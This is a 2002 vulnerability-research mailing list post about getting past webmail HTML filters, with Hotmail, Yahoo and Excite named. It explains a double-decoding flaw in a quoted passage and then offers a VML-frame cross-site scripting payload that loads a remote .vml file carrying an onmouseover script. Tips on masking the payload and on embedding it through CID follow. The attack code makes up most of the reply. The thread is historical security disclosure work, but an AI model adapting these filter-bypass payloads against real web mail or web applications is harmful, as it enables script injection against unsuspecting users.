Vulnerability Development mailing list archives

Re: double decoding filter bypass (Hotmail) + challenge for you

From: "http-equiv () excite com" <http-equiv () malware com>
Date: Wed, 17 Jul 2002 23:16:35 -0000

<!-- So what about Hotmail ? Well, where can we put unicode in an 
html message ? Into an url as %xx, yep, but that's not the point 
here. There is a thing called "html entities" : you can replace *any* 
printable character by its ascii/unicode value in the values of the 
parameters of html tags, for instance in the parameters of the STYLE 
tag (hint !).  "A" is &#x41, "B" is &#x42, etc.

What the hotmail filter did is replacing any html entity by its

corresponding character, then trying to filter out any bad string 
(forbidden keywords), THEN giving the output to the user, without re-
applying the filter on this output. But, if there are still html 
entities into this output, the user's browser will interpret them, 
that will possibly give birth to some interesting forbidden 
keywords... and fire a script.-->


Excellent. 

Here's another one for you FozZY:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>

<v:vmlframe 
style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; 
HEIGHT: 200px" 
src = 
"http://www.malware.com/fooness.vml#malware";></v:vmlframe>

where fooness.vml#malware is:

   <xml xmlns:v = "urn:schemas-microsoft-com:vml">
 <v:rect id="malware"  fillcolor="green" 
   style="position:relative;top:1;left:1;width:20;height:20"
onmouseover="alert('malware was here')">
   </v:rect>
</xml>

1. This works on Yahoo and Excite, probably others
2. Quick fiddling suggests only mouseover works
3. Hotmail only filters this:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>

which is absolutely required. Probably easier to mask than 
say "Javascript"

note 1/: can't recall, Hotmail may not allow for retrieval of files 
remotely, or base64 encodes them on the Hotmail server if there are 
any. If so, you can embed and CID: the fooness.vml

note /2: the above may also work in IE dependent mail clients 
(Eudora..?..)

note /3: doesn't want to work in Outlook Express with scripting off 
even though the frame aspect works - which is patched in OE6

-- 
http://www.malware.com

Current thread:

double decoding filter bypass (Hotmail) + challenge for you FozZy (Jul 15)
- <Possible follow-ups>
- Re: double decoding filter bypass (Hotmail) + challenge for you http-equiv () excite com (Jul 17)
  - Re: double decoding filter bypass (Hotmail) + challenge for you FozZy (Jul 18)
  - nsmail XSS hole (was Re: double decoding filter bypass (Hotmail) + challenge for you) FozZy (Jul 18)